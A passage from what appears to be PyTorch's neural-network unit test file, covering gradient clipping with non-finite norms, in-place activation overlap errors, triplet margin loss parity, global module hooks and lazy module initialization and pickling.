seeds = (44, 83, 71, 25, 999)
for sd in seeds:
torch.manual_seed(sd)
x = torch.randn(1, 12, 12, device=device, requires_grad=True)
gradcheck(func, [x])
gradgradcheck(func, [x])
if device == 'cpu':
test_dtype(func, x, torch.bfloat16)
def test_logsigmoid_out(self, device):
# this isn't actually documented, but was broken previously:
# https://github.com/pytorch/pytorch/issues/36499
x = torch.randn(2, 3, device=device).t()
empty_out = torch.randn(0, device=device)
self.assertEqual(F.logsigmoid(x), F.logsigmoid(x, out=empty_out))
noncontig_out = torch.randn(2, 3, device=device).t()
self.assertEqual(F.logsigmoid(x), F.logsigmoid(x, out=noncontig_out))
def test_maxpool3d_non_square_backward(self, device):
# A previous CUDA implementation of this backward computed the kernel launch
# grid size with the last two dimensions interchanged, so the tail along the
# longer dim was ignored. Here we test whether every position gets a gradient.
for dim in (2, 3, 4):
shape = tuple(32 if i != dim else 256 for i in range(4))
x = torch.randn(shape, device=device, requires_grad=True)
F.max_pool3d(x, kernel_size=(1, 1, 1)).sum().backward()
self.assertEqual(x.grad, torch.ones_like(x.grad))
# Check that clip_grad_norm_ raises an error if the total norm of the
# parameters' gradients is non-finite
def test_clip_grad_norm_error_if_nonfinite(self, device):
norms_pos = [0.1, 1, 2, 3.5, inf]
norms_neg = [-0.1, -1, -2, -3.5]
norms_except_0 = norms_pos + norms_neg
norms_all = norms_except_0 + [0]
# Each entry in test_cases has the following values, in this order:
#
# grad_only_one_elem If True, only one element of the parameter's
# gradient is set to the scalar grad, and the
# rest of the elements are 0. If False, all grad
# elements are equal to the scalar.
#
# prefix_finite_grad_param If True, prefix a parameter that has a grad
# of 1.
#
# scalars Scalars to use as the parameter's grad, through
# multiplication
#
# norms_nonfinite Norm types that should produce nonfinite total norm
#
# norms_finite Norm types that should produce finite total norm
test_cases = [
# Test errors from an infinite grad
(False, False, [inf, -inf], norms_except_0, [0]),
(False, True, [inf, -inf], norms_pos, norms_neg + [0]),
(True, False, [inf, -inf], norms_pos, norms_neg + [0]),
(True, True, [inf, -inf], norms_pos, norms_neg + [0]),
# Test errors from a NaN grad
(False, False, [nan], norms_except_0, [0]),
(False, True, [nan], norms_except_0, [0]),
(True, False, [nan], norms_except_0, [0]),
(True, True, [nan], norms_except_0, [0]),
# Test a grad that should never error
(False, False, [2e22, -2e22], [], norms_all),
(False, True, [2e22, -2e22], [], norms_all),
(True, False, [2e22, -2e22], [], norms_all),
(True, True, [2e22, -2e22], [], norms_all),
# Test a grad that will overflow to inf for only some norm orders
(False, False, [2e200, -2e200], [3.5, 2, -2, -3.5], [inf, 1, 0.1, 0, -1, -0.1]),
(False, True, [2e200, -2e200], [3.5, 2], norms_neg + [inf, 1, 0.1, 0]),
(True, False, [2e200, -2e200], [3.5, 2], norms_neg + [inf, 1, 0.1, 0]),
(True, True, [2e200, -2e200], [3.5, 2], norms_neg + [inf, 1, 0.1, 0]),
]
def gen_parameters(scalar, grad_only_one_elem, prefix_finite_grad_param):
param = torch.ones(10, dtype=torch.float64, device=device, requires_grad=True)
if grad_only_one_elem:
param[1].mul(scalar).sum().backward()
else:
param.mul(scalar).sum().backward()
if prefix_finite_grad_param:
prefix_param = torch.ones(1, dtype=torch.float64, device=device, requires_grad=True)
prefix_param.mul(1).sum().backward()
parameters = [prefix_param, param]
else:
parameters = [param]
return parameters
def run_test_case(norm_type, error_if_nonfinite, scalar, grad_only_one_elem, prefix_finite_grad_param, is_norm_nonfinite):
msg = (
f'norm_type: {norm_type}, '
f'error_if_nonfinite: {error_if_nonfinite}, '
f'scalar: {scalar}, '
f'grad_only_one_elem: {grad_only_one_elem}, '
f'prefix_finite_grad_param: {prefix_finite_grad_param}, '
f'is_norm_nonfinite: {is_norm_nonfinite}')
parameters = gen_parameters(scalar, grad_only_one_elem, prefix_finite_grad_param)
# Should only throw an error if the total norm is expected to be
# nonfinite and `error_if_nonfinite=True`
if is_norm_nonfinite and error_if_nonfinite:
error_msg = f'The total norm of order {float(norm_type)} for gradients'
grads_before = [p.grad.clone() for p in parameters]
with self.assertRaisesRegex(RuntimeError, error_msg, msg=msg):
clip_grad_norm_(parameters, 1, norm_type=norm_type, error_if_nonfinite=True)
# Grad should not change if error is thrown
grads_after = [p.grad for p in parameters]
self.assertEqual(grads_before, grads_after, msg=msg)
else:
clip_grad_norm_(parameters, 1, norm_type=norm_type, error_if_nonfinite=error_if_nonfinite)
for grad_only_one_elem, prefix_finite_grad_param, scalars, norms_nonfinite, norms_finite in test_cases:
for error_if_nonfinite in [False, True]:
for norm_type, scalar in product(norms_nonfinite, scalars):
run_test_case(norm_type, error_if_nonfinite, scalar, grad_only_one_elem, prefix_finite_grad_param, True)
for norm_type, scalar in product(norms_finite, scalars):
run_test_case(norm_type, error_if_nonfinite, scalar, grad_only_one_elem, prefix_finite_grad_param, False)
@onlyCUDA
@deviceCountAtLeast(2)
def test_clip_grad_norm_multi_device(self, devices):
class TestModel(nn.Module):
def __init__(self):
super(TestModel, self).__init__()
self.layer1 = nn.Linear(10, 10)
self.layer2 = nn.Linear(10, 10)
test_model = TestModel()
test_model.layer1.to(devices[0])
test_model.layer2.to(devices[1])
ref_model = TestModel().to(devices[0])
for norm_type in [2., math.inf]:
for p in test_model.parameters():
p.grad = torch.ones_like(p)
for p in ref_model.parameters():
p.grad = torch.ones_like(p)
norm = clip_grad_norm_(test_model.parameters(), 0.5, norm_type=norm_type)
expected = clip_grad_norm_(ref_model.parameters(), 0.5, norm_type=norm_type)
self.assertEqual(norm, expected)
for p, pe in zip(test_model.parameters(), ref_model.parameters()):
self.assertEqual(p.grad.to(devices[0]), pe.grad)
def test_elu_inplace_overlap(self, device):
x = torch.randn((1, 6), device=device).expand((6, 6))
with self.assertRaisesRegex(RuntimeError, 'unsupported operation'):
F.elu(x, inplace=True)
with self.assertRaisesRegex(RuntimeError, 'unsupported operation'):
F.elu_(x)
@expectedFailureMeta # https://github.com/pytorch/pytorch/issues/54897
def test_hardswish_inplace_overlap(self, device):
x = torch.randn((1, 6), device=device).expand((6, 6))
with self.assertRaisesRegex(RuntimeError, 'unsupported operation'):
F.hardswish(x, inplace=True)
def test_silu_inplace_overlap(self, device):
x = torch.randn((1, 6), device=device).expand((6, 6))
with self.assertRaisesRegex(RuntimeError, 'unsupported operation'):
F.silu(x, inplace=True)
@onlyOnCPUAndCUDA
def test_mish_inplace_overlap(self, device):
x = torch.randn((1, 6), device=device).expand((6, 6))
with self.assertRaisesRegex(RuntimeError, 'unsupported operation'):
F.mish(x, inplace=True)
def test_softplus_inplace_overlap(self, device):
x = torch.randn((1, 6), device=device).expand((6, 6))
with self.assertRaisesRegex(RuntimeError, 'unsupported operation'):
F.softplus(x, out=x)
def test_softplus_low_threshold(self, device):
# Ensure gradients are computed correctly with a low threshold.
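# Softplus reverts to the identity for inputs above the threshold; 0.9 stays
# below threshold=1, so the exact log(1 + exp(x)) path and its gradient are exercised.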
model = torch.nn.Softplus(threshold=1).double()
input = torch.tensor(0.9, device=device, dtype=torch.double,
requires_grad=True)
output = model(input)
torch.autograd.gradcheck(model, input)
def test_softshrink_inplace_overlap(self, device):
x = torch.randn((1, 6), device=device).expand((6, 6))
with self.assertRaisesRegex(RuntimeError, 'unsupported operation'):
F.softshrink(x, out=x)
def test_leaky_relu_inplace_overlap(self, device):
x = torch.randn((1, 6), device=device).expand((6, 6))
with self.assertRaisesRegex(RuntimeError, 'unsupported operation'):
F.leaky_relu(x, inplace=True)
with self.assertRaisesRegex(RuntimeError, 'unsupported operation'):
F.leaky_relu_(x)
def test_threshold_inplace_overlap(self, device):
# Inplace threshold is okay, because it is idempotent
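# e.g. F.threshold(F.threshold(x, 0.5, 0.5), 0.5, 0.5) equals F.threshold(x, 0.5, 0.5),
# so overlapping reads and writes cannot change the result.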
x = torch.randn((1, 6), device=device).expand((6, 6))
F.threshold(x, 0.5, 0.5, inplace=True)
F.threshold_(x, 0.5, 0.5)
@onlyOnCPUAndCUDA
def test_triplet_margin_with_distance_loss_default_parity(self, device):
# Test for `nn.TripletMarginWithDistanceLoss` and
# `F.triplet_margin_with_distance_loss`. Checks
# for parity against the respective non-distance-agnostic
# implementations of triplet margin loss (``nn.TripletMarginLoss`
# and `F.triplet_margin_loss`) under *default args*.
for extra_args in \
itertools.product((0.5, 1, 1.5), (True, False), ('none', 'mean', 'sum')):
kwargs = {'margin': extra_args[0], 'swap': extra_args[1], 'reduction': extra_args[2]}
anchor = torch.randn(5, 10, device=device, requires_grad=True)
positive = torch.randn(5, 10, device=device, requires_grad=True)
negative = torch.randn(5, 10, device=device, requires_grad=True)
# Test forward, functional
expected = F.triplet_margin_loss(anchor, positive, negative, **kwargs)
actual = F.triplet_margin_with_distance_loss(anchor, positive, negative, **kwargs)
self.assertEqual(actual, expected, rtol=1e-6, atol=1e-6)
# Test forward, module
loss_ref = nn.TripletMarginLoss(**kwargs)
loss_op = nn.TripletMarginWithDistanceLoss(**kwargs)
self.assertEqual(loss_op(anchor, positive, negative),
loss_ref(anchor, positive, negative),
rtol=1e-6, atol=1e-6)
# Test backward
self.assertTrue(gradcheck(lambda a, p, n: F.triplet_margin_with_distance_loss(
a, p, n, **kwargs), (anchor, positive, negative)))
self.assertTrue(gradcheck(lambda a, p, n: loss_op(a, p, n),
(anchor, positive, negative)))
@onlyOnCPUAndCUDA
def test_triplet_margin_with_distance_loss(self, device):
# Test for parity between `nn.TripletMarginWithDistanceLoss` and
# `F.triplet_margin_with_distance_loss`.
pairwise_distance = nn.PairwiseDistance()
def cosine_distance(x, y):
return 1.0 - F.cosine_similarity(x, y)
distance_functions = (pairwise_distance, cosine_distance,
lambda x, y: 1.0 - F.cosine_similarity(x, y))
reductions = ('mean', 'none', 'sum')
margins = (1.0, 1.5, 0.5)
swaps = (True, False)
for distance_fn, reduction, margin, swap \
in itertools.product(distance_functions, reductions, margins, swaps):
anchor = torch.randn(5, 10, device=device, requires_grad=True)
positive = torch.randn(5, 10, device=device, requires_grad=True)
negative = torch.randn(5, 10, device=device, requires_grad=True)
# Test backward
self.assertTrue(gradcheck(lambda a, p, n: F.triplet_margin_with_distance_loss(
a, p, n, distance_function=distance_fn, reduction=reduction, margin=margin, swap=swap),
(anchor, positive, negative)))
loss_op = nn.TripletMarginWithDistanceLoss(distance_function=distance_fn,
reduction=reduction, margin=margin, swap=swap)
self.assertTrue(gradcheck(lambda a, p, n: loss_op(
a, p, n), (anchor, positive, negative)))
traced_loss_op = torch.jit.trace(loss_op, (anchor, positive, negative))
self.assertTrue(gradcheck(lambda a, p, n: traced_loss_op(
a, p, n), (anchor, positive, negative)))
# Test forward parity
functional = F.triplet_margin_with_distance_loss(anchor, positive, negative,
distance_function=distance_fn,
reduction=reduction, margin=margin, swap=swap)
modular = loss_op(anchor, positive, negative)
traced = traced_loss_op(anchor, positive, negative)
self.assertEqual(functional, modular, atol=1e-6, rtol=1e-6)
self.assertEqual(traced, modular, atol=1e-6, rtol=1e-6)
def test_to_complex(self, device):
m = nn.Linear(3, 5).to(device)
self.assertIs(m, m.to(device))
m.to(torch.cfloat)
self.assertIs(m.weight.dtype, torch.cfloat)
m.to(torch.cdouble)
self.assertIs(m.weight.dtype, torch.cdouble)
m.to(torch.float)
self.assertIs(m.weight.dtype, torch.float)
with warnings.catch_warnings(record=True) as w:
# Trigger warning
m.to(torch.cfloat)
# Check warning occurs
self.assertEqual(len(w), 1)
self.assertTrue("Complex modules are a new feature" in str(w[-1].message))
@skipMeta
@dtypes(torch.float32, torch.float64)
def test_module_to_empty(self, device, dtype):
class MyModule(nn.Module):
def __init__(self, in_features, out_features, device=None, dtype=None):
super().__init__()
factory_kwargs = {"device": device, "dtype": dtype}
self.weight = nn.Parameter(torch.randn(in_features, out_features, **factory_kwargs))
def forward(self, x):
return x @ self.weight
# Test meta module instantiation.
input = torch.randn(5, 10, device=device, dtype=dtype)
m = MyModule(10, 1, device='meta', dtype=dtype)
m(input)
# Test materializing meta module on a real device.
m.to_empty(device=device)
m(input)
with torch.no_grad():
torch.nn.init.kaiming_uniform_(m.weight)
m(input)
# Test creating meta module from materialized module.
m.to_empty(device='meta')
m(input)
@skipMeta
def test_skip_init(self, device):
torch.manual_seed(1)
m_initialized = torch.nn.Linear(5, 1)
m_initialized.to(device)
torch.manual_seed(1)
m_uninitialized = torch.nn.utils.skip_init(torch.nn.Linear, 5, 1, device=device)
self.assertEqual(m_initialized.weight.device, m_uninitialized.weight.device)
self.assertFalse(torch.allclose(m_initialized.weight, m_uninitialized.weight))
class TestModuleGlobalHooks(TestCase):
def tearDown(self):
nn.modules.module._global_backward_hooks = OrderedDict()
nn.modules.module._global_forward_hooks = OrderedDict()
nn.modules.module._global_forward_pre_hooks = OrderedDict()
def test_module_global_hooks(self):
module = nn.Sigmoid
module_1 = module()
module_2 = module()
module_3 = module()
input = torch.ones(5, 5, requires_grad=True)
counter = {
'forwards': 0,
'backwards': 0
}
def fw_hook(inc, h_module, input, output):
self.assertIsInstance(input, tuple)
self.assertTrue(isinstance(output, torch.Tensor))
self.assertTrue(isinstance(h_module, module))
self.assertEqual(input[0], torch.ones(5, 5))
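# with an all-ones input, the expected output is sigmoid(1) = 1 / (1 + e**-1), written here as 1 / (1 + 1/math.e)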
self.assertEqual(output, torch.empty(5, 5).fill_(1 / (1 + 1 / math.e)))
counter['forwards'] += inc
def bw_hook(inc, h_module, grad_input, grad_output):
self.assertIsInstance(grad_input, tuple)
self.assertIsInstance(grad_output, tuple)
self.assertTrue(isinstance(h_module, module))
self.assertEqual(grad_output[0], torch.ones(5, 5) * 2)
counter['backwards'] += inc
test_fwd = nn.modules.module.register_module_forward_hook(lambda *args: fw_hook(1, *args))
module_1(input)
module_2(input)
module_3(input)
self.assertEqual(counter['forwards'], 3)
self.assertEqual(counter['backwards'], 0)
test_bwd = nn.modules.module.register_module_backward_hook(
lambda *args: bw_hook(1, *args))
output_1 = module_1(input)
output_2 = module_2(input)
output_3 = module_3(input)
self.assertEqual(counter['forwards'], 6)
self.assertEqual(counter['backwards'], 0)
output_1.backward(torch.ones(5, 5) * 2, retain_graph=True)
output_2.backward(torch.ones(5, 5) * 2, retain_graph=False)
output_3.backward(torch.ones(5, 5) * 2, retain_graph=False)
self.assertEqual(counter['forwards'], 6)
self.assertEqual(counter['backwards'], 3)
output_1.backward(torch.ones(5, 5) * 2, retain_graph=True)
self.assertEqual(counter['forwards'], 6)
self.assertEqual(counter['backwards'], 4)
test2_fwd = nn.modules.module.register_module_forward_hook(lambda *args: fw_hook(2, *args))
output = module_1(input)
output = module_2(input)
output = module_3(input)
self.assertEqual(counter['forwards'], 15)
self.assertEqual(counter['backwards'], 4)
test2_bwd = nn.modules.module.register_module_backward_hook(lambda *args: bw_hook(2, *args))
module_1(input).backward(torch.ones(5, 5) * 2)
self.assertEqual(counter['forwards'], 18)
self.assertEqual(counter['backwards'], 7)
test2_bwd.remove()
module_2(input).backward(torch.ones(5, 5) * 2)
self.assertEqual(counter['forwards'], 21)
self.assertEqual(counter['backwards'], 8)
test2_fwd.remove()
module_3(input).backward(torch.ones(5, 5) * 2)
self.assertEqual(counter['forwards'], 22)
self.assertEqual(counter['backwards'], 9)
test_fwd.remove()
test_bwd.remove()
def test_module_global_hook_invalid_outputs(self):
module = nn.Sigmoid()
input = torch.randn(5, 5, requires_grad=True)
def bw_fail1(self, grad_input, grad_output):
return grad_input[:-1]
def bw_fail2(self, grad_input, grad_output):
return grad_input + (torch.randn(2, 2),)
with nn.modules.module.register_module_backward_hook(bw_fail1):
with self.assertRaisesRegex(RuntimeError, 'got 0, but expected 1'):
module(input).sum().backward()
with nn.modules.module.register_module_backward_hook(bw_fail2):
with self.assertRaisesRegex(RuntimeError, 'got 2, but expected 1'):
module(input).sum().backward()
def test_module_backward_global_hook_writeable(self):
module = nn.Sigmoid()
input = torch.randn(5, 5, requires_grad=True)
sig_x = torch.sigmoid(input)
def bw_hook(module, grad_input, grad_output):
for grad in grad_input:
self.assertTrue(isinstance(grad, torch.Tensor))
for grad in grad_output:
self.assertTrue(isinstance(grad, torch.Tensor))
return tuple(gi * 2 for gi in grad_input)
nn.modules.module.register_module_backward_hook(bw_hook)
module(input).backward(torch.ones(5, 5))
expected_grad = sig_x * (1 - sig_x) * 2
self.assertEqual(input.grad, expected_grad)
def test_module_global_forward_preforward_hook_writeable(self):
module = nn.Sigmoid()
input = torch.randn(5, 5, requires_grad=True)
sig_x = torch.sigmoid(input)
def forward_pre_hook(m, input):
return torch.nn.functional.relu(input[0])
def forward_hook(m, input, output):
return -output
nn.modules.module.register_module_forward_pre_hook(forward_pre_hook)
nn.modules.module.register_module_forward_hook(forward_hook)
output = module(input)
expected_res = -torch.sigmoid(torch.nn.functional.relu(input))
self.assertEqual(output, expected_res)
output.backward(torch.ones(5, 5) * 2, retain_graph=True)
mask = (input > 0).double()
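# output is -sigmoid(relu(x)): its derivative is -sig_x * (1 - sig_x) where x > 0
# (the mask) and 0 elsewhere, scaled by the upstream gradient of 2.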
expected_grad = -sig_x * (1 - sig_x) * 2 * mask
self.assertEqual(input.grad, expected_grad)
def test_module_forward_preforward_hook_removable(self):
"""
This test is to test when multiple pre-forward hook functions can be
registered successfully and used correctly, if the handle can be removable
during the pre-forward hook function call.
"""
module = nn.Sigmoid()
def removable_hook(m, input):
nonlocal handle
handle.remove()
return input
def removable_hook_2(m, input):
nonlocal handle_2
handle_2.remove()
return input
handle = module.register_forward_pre_hook(removable_hook)
handle_2 = module.register_forward_pre_hook(removable_hook_2)
# make sure hook register is successful
self.assertEqual(len(handle.hooks_dict_ref()), 2)
self.assertEqual(len(handle_2.hooks_dict_ref()), 2)
input = torch.randn(2, 2)
output = module(input)
self.assertEqual(torch.sigmoid(input), output)
# make sure hook removal is successful
self.assertFalse(handle.id in handle.hooks_dict_ref())
self.assertFalse(handle_2.id in handle.hooks_dict_ref())
self.assertEqual(len(handle.hooks_dict_ref()), 0)
self.assertEqual(len(handle_2.hooks_dict_ref()), 0)
def test_module_forward_forward_hook_removable(self):
"""
This test is to test when multiple forward hook functions can be registered
successfully and used correctly, if the handle can be removable during the
forward hook function call.
"""
module = nn.Sigmoid()
def removable_hook(m, input, output):
nonlocal handle
handle.remove()
return output
def removable_hook_2(m, input, output):
nonlocal handle_2
handle_2.remove()
return output
handle = module.register_forward_hook(removable_hook)
handle_2 = module.register_forward_hook(removable_hook_2)
# make sure hook register is successful
self.assertEqual(len(handle.hooks_dict_ref()), 2)
self.assertEqual(len(handle_2.hooks_dict_ref()), 2)
input = torch.randn(2, 2)
output = module(input)
self.assertEqual(torch.sigmoid(input), output)
# make sure hook removal is successful
self.assertFalse(handle.id in handle.hooks_dict_ref())
self.assertFalse(handle_2.id in handle.hooks_dict_ref())
self.assertEqual(len(handle.hooks_dict_ref()), 0)
self.assertEqual(len(handle_2.hooks_dict_ref()), 0)
def test_global_and_local_hooks_order(self):
module = nn.Sigmoid()
global_forward_pre_called = False
local_forward_pre_called = False
global_forward_called = False
local_forward_called = False
global_backward_called = False
local_backward_called = False
def global_forward_pre_hook(m, input):
nonlocal global_forward_pre_called
self.assertTrue(not local_forward_pre_called)
global_forward_pre_called = True
return input
def local_forward_pre_hook(m, input):
nonlocal local_forward_pre_called
self.assertTrue(global_forward_pre_called)
local_forward_pre_called = True
return input
def global_forward_hook(m, input, output):
nonlocal global_forward_called
self.assertTrue(not local_forward_called)
global_forward_called = True
return output
def local_forward_hook(m, input, output):
nonlocal local_forward_called
self.assertTrue(global_forward_called)
local_forward_called = True
return output
def global_backward_hook(m, input, output):
nonlocal global_backward_called
self.assertTrue(not local_backward_called)
global_backward_called = True
return input
def local_backward_hook(m, input, output):
nonlocal local_backward_called
self.assertTrue(global_backward_called)
local_backward_called = True
return input
input = torch.randn(5, 5, requires_grad=True)
nn.modules.module.register_module_forward_pre_hook(global_forward_pre_hook)
module.register_forward_pre_hook(local_forward_pre_hook)
nn.modules.module.register_module_forward_hook(global_forward_hook)
module.register_forward_hook(local_forward_hook)
nn.modules.module.register_module_backward_hook(global_backward_hook)
module.register_backward_hook(local_backward_hook)
output = module(input)
self.assertTrue(local_forward_called and local_forward_pre_called and global_forward_called and global_forward_pre_called)
output.backward(torch.ones(5, 5), retain_graph=True)
self.assertTrue(local_backward_called and global_backward_called)
class LazyModule(torch.nn.modules.lazy.LazyModuleMixin, torch.nn.Module):
pass
class TestLazyModules(TestCase):
@suppress_warnings
def test_lazy_module_parameter(self):
module = LazyModule()
module.register_parameter('test_param', UninitializedParameter())
self.assertTrue(module.has_uninitialized_params())
state_dict = module.state_dict()
self.assertIsInstance(state_dict['test_param'], UninitializedParameter)
new_module = LazyModule()
# An error is raised when there is an attempt to replace an existing parameter
# with an uninitialized one
new_module.register_parameter('test_param', nn.Parameter(torch.ones(5, 5)))
with self.assertRaisesRegex(RuntimeError, 'shape of an uninitialized'):
new_module.load_state_dict(state_dict)
# Uninitialized parameters are overridden when the state dict to be loaded contains a valid one
new_module = LazyModule()
new_module.register_parameter('test_param', nn.Parameter(torch.ones(5, 5)))
module.load_state_dict(new_module.state_dict())
self.assertEqual(module.test_param, torch.ones((5, 5)))
# Uninitialized parameters are left unchanged
module = LazyModule()
module.register_parameter('test_param', UninitializedParameter())
self.assertTrue(module.has_uninitialized_params())
new_module = LazyModule()
new_module.register_parameter('test_param', UninitializedParameter())
module.load_state_dict(new_module.state_dict())
self.assertTrue(module.has_uninitialized_params())
@suppress_warnings
def test_lazy_module_buffer(self):
module = LazyModule()
module.register_buffer('test_buffer', UninitializedBuffer())
self.assertTrue(module.has_uninitialized_params())
state_dict = module.state_dict()
self.assertIsInstance(state_dict['test_buffer'], UninitializedBuffer)
new_module = LazyModule()
# An error is raised when there is an attempt to replace an existing buffer
# with an uninitialized one
new_module.register_buffer('test_buffer', torch.ones(5, 5))
with self.assertRaisesRegex(RuntimeError, 'shape of an uninitialized'):
new_module.load_state_dict(state_dict)
# Uninitialized buffers are overridden when the state dict to be loaded contains a valid one
new_module = LazyModule()
new_module.register_buffer('test_buffer', torch.ones(5, 5))
module.load_state_dict(new_module.state_dict())
self.assertEqual(module.test_buffer, torch.ones((5, 5)))
# Uninitialized buffers are left unchanged
module = LazyModule()
module.register_buffer('test_buffer', UninitializedBuffer())
self.assertTrue(module.has_uninitialized_params())
new_module = LazyModule()
new_module.register_buffer('test_buffer', UninitializedBuffer())
module.load_state_dict(new_module.state_dict())
self.assertTrue(module.has_uninitialized_params())
@suppress_warnings
def test_lazy_module_jit_param(self):
module = LazyModule()
module.register_parameter('test_param', UninitializedParameter())
self.assertTrue(module.has_uninitialized_params())
with self.assertRaisesRegex(RuntimeError, 'run a forward pass'):
torch.jit.script(module)
@suppress_warnings
def test_lazy_module_jit_buffer(self):
module = LazyModule()
module.register_buffer('test_buffer', UninitializedBuffer())
self.assertTrue(module.has_uninitialized_params())
with self.assertRaisesRegex(RuntimeError, 'run a forward pass'):
torch.jit.script(module)
@suppress_warnings
def test_lazy_share_memory_param(self):
module = LazyModule()
module.register_parameter('test_param', UninitializedParameter())
self.assertTrue(module.has_uninitialized_params())
with self.assertRaisesRegex(RuntimeError, 'share memory on an uninitialized'):
module.share_memory()
@suppress_warnings
def test_lazy_share_memory_buffer(self):
module = LazyModule()
module.register_buffer('test_buffer', UninitializedBuffer())
self.assertTrue(module.has_uninitialized_params())
with self.assertRaisesRegex(RuntimeError, 'share memory on an uninitialized'):
module.share_memory()
@suppress_warnings
def test_linear(self):
module = nn.LazyLinear(10)
self.assertIsInstance(module.weight, UninitializedParameter)
self.assertIsInstance(module.bias, UninitializedParameter)
input = torch.ones(5, 5)
module(input)
self.assertIsInstance(module, nn.Linear)
self.assertNotIsInstance(module, nn.LazyLinear)
self.assertTrue(module.weight.shape == (10, 5))
self.assertTrue(module.bias.shape == (10,))
y = module(input)
self.assertTrue(torch.equal(torch.nn.functional.linear(input, module.weight, module.bias), y))
@suppress_warnings
def test_lazy_linear_pickle(self):
module = nn.LazyLinear(10)
self.assertIsInstance(module.weight, UninitializedParameter)
self.assertIsInstance(module.bias, UninitializedParameter)
module = pickle.loads(pickle.dumps(module))
self.assertIsInstance(module, nn.LazyLinear)
self.assertIsInstance(module.weight, UninitializedParameter)
self.assertIsInstance(module.bias, UninitializedParameter)
input = torch.ones(5, 5)
module(input) # fully materialized
new_module = pickle.loads(pickle.dumps(module))
self.assertIsInstance(new_module, nn.Linear)
self.assertNotIsInstance(new_module, nn.LazyLinear)
self.assertTrue(new_module.weight.shape == (10, 5))
self.assertNotIsInstance(new_module.weight, UninitializedParameter)
self.assertTrue(new_module.bias.shape == (10,))
self.assertNotIsInstance(new_module.bias, UninitializedParameter)
@suppress_warnings
def test_linear_state(self):
module = nn.Linear(5, 10)
lazy_module = nn.LazyLinear(10)
lazy_module.load_state_dict(module.state_dict())
# Parameters have been initialized but the module won't become a full
# Linear one until the first forward pass. This is due to
# limitations on the state_dict loading logic
self.assertFalse(lazy_module.has_uninitialized_params())
self.assertTrue(lazy_module.weight.shape == (10, 5))
self.assertTrue(lazy_module.bias.shape == (10,))
module = nn.Linear(5, 10)
lazy_module = nn.LazyLinear(10)
with self.assertRaisesRegex(RuntimeError, 'shape of an uninitialized'):
module.load_state_dict(lazy_module.state_dict())
def _check_lazy_conv(self, cls, lazy_cls, func, init_args, input_shape,
expected_weight_shape, expected_bias_shape):
module = lazy_cls(*init_args)
self.assertIsInstance(module.weight, UninitializedParameter)
if module.bias is not None:
self.assertIsInstance(module.bias, UninitializedParameter)
input = torch.ones(*input_shape)
module(input)
self.assertIsInstance(module, cls)
self.assertNotIsInstance(module, lazy_cls)
self.assertEqual(module.weight.shape, expected_weight_shape)
if module.bias is not None:
self.assertEqual(module.bias.shape, expected_bias_shape)
y = module(input)
self.assertTrue(torch.equal(func(input, module.weight, module.bias), y))
def _check_lazy_conv_pickle(self, cls, lazy_cls, init_args, input_shape,
expected_weight_shape, expected_bias_shape):
module = lazy_cls(*init_args)
self.assertIsInstance(module.weight, UninitializedParameter)
if module.bias is not None:
self.assertIsInstance(module.bias, UninitializedParameter)
module = pickle.loads(pickle.dumps(module))
self.assertIsInstance(module, lazy_cls)
self.assertIsInstance(module.weight, UninitializedParameter)
if module.bias is not None:
self.assertIsInstance(module.bias, UninitializedParameter)
input = torch.ones(*input_shape)
module(input) # fully materialized
new_module = pickle.loads(pickle.dumps(module))
self.assertIsInstance(new_module, cls)
self.assertNotIsInstance(new_module, lazy_cls)
self.assertEqual(new_module.weight.shape, expected_weight_shape)
self.assertNotIsInstance(new_module.weight, UninitializedParameter)
if new_module.bias is not None:
self.assertEqual(new_module.bias.shape, expected_bias_shape)
self.assertNotIsInstance(new_module.bias, UninitializedParameter)
def _check_lazy_conv_state(self, gen_module, gen_lazy_module,
expected_weight_shape, expected_bias_shape):
module = gen_module()
lazy_module = gen_lazy_module()
lazy_module.load_state_dict(module.state_dict())
# Parameters have been initialized but the module won't become a full
# Conv one until the first forward pass. This is due to
# limitations on the state_dict loading logic
self.assertFalse(lazy_module.has_uninitialized_params())
self.assertEqual(lazy_module.weight.shape, expected_weight_shape)
if lazy_module.bias is not None:
self.assertEqual(lazy_module.bias.shape, expected_bias_shape)
module = gen_module()
lazy_module = gen_lazy_module()
with self.assertRaisesRegex(RuntimeError, 'shape of an uninitialized'):
module.load_state_dict(lazy_module.state_dict())
def test_lazy_pre_forward_hook(self):
"""
This test is to test whether lazymodule can register other pre-forward hook
functions successfully.
"""
class TestModule(torch.nn.modules.lazy.LazyModuleMixin, torch.nn.Module):
def __init__(self):
super().__init__()
def initialize_parameters(self, input):
return None
def forward(self, input):
return input
def hook_function(module, input):
return input[0] + 1
module = TestModule()
module.register_forward_pre_hook(hook_function)
output = module(torch.zeros(2, 2))
self.assertEqual(output, torch.ones(2, 2))
def test_lazy_forward_hook(self):
"""
This test is to test whether lazymodule can register other forward hook
functions successfully.
"""
class TestModule(torch.nn.modules.lazy.LazyModuleMixin, torch.nn.Module):
def __init__(self):
super().__init__()
def initialize_parameters(self, input):
return None
def forward(self, input):
return input
def hook_function(module, input, output):
return input[0] + 1
module = TestModule()
module.register_forward_hook(hook_function)
output = module(torch.zeros(2, 2))
self.assertEqual(output, torch.ones(2, 2))
@suppress_warnings
def test_lazy_conv1d(self):
self._check_lazy_conv(nn.Conv1d, nn.LazyConv1d, torch.nn.functional.conv1d,
(32, 2), (192, 16, 50), (32, 16, 2), (32,))
@suppress_warnings
def test_lazy_conv1d_pickle(self):
self._check_lazy_conv_pickle(nn.Conv1d, nn.LazyConv1d, (32, 2), (192, 16, 50),
(32, 16, 2), (32,))
@suppress_warnings
def test_lazy_conv1d_state(self):
self._check_lazy_conv_state(lambda: nn.Conv1d(16, 32, 2),
lambda: nn.LazyConv1d(32, 2),
(32, 16, 2), (32,))
@suppress_warnings
def test_lazy_conv2d(self):
self._check_lazy_conv(nn.Conv2d, nn.LazyConv2d, torch.nn.functional.conv2d,
(32, 2), (192, 16, 8, 6), (32, 16, 2, 2), (32,))
@suppress_warnings
def test_lazy_conv2d_pickle(self):
self._check_lazy_conv_pickle(nn.Conv2d, nn.LazyConv2d, (32, 2), (192, 16, 8, 6),
(32, 16, 2, 2), (32,))
@suppress_warnings
def test_lazy_conv2d_state(self):
self._check_lazy_conv_state(lambda: nn.Conv2d(16, 32, 2),
lambda: nn.LazyConv2d(32, 2),
(32, 16, 2, 2), (32,))
@suppress_warnings
def test_lazy_conv3d(self):
self._check_lazy_conv(nn.Conv3d, nn.LazyConv3d, torch.nn.functional.conv3d,
(32, 2), (192, 16, 8, 7, 6), (32, 16, 2, 2, 2), (32,))
@suppress_warnings
def test_lazy_conv3d_pickle(self):
self._check_lazy_conv_pickle(nn.Conv3d, nn.LazyConv3d, (32, 2), (192, 16, 8, 7, 6),
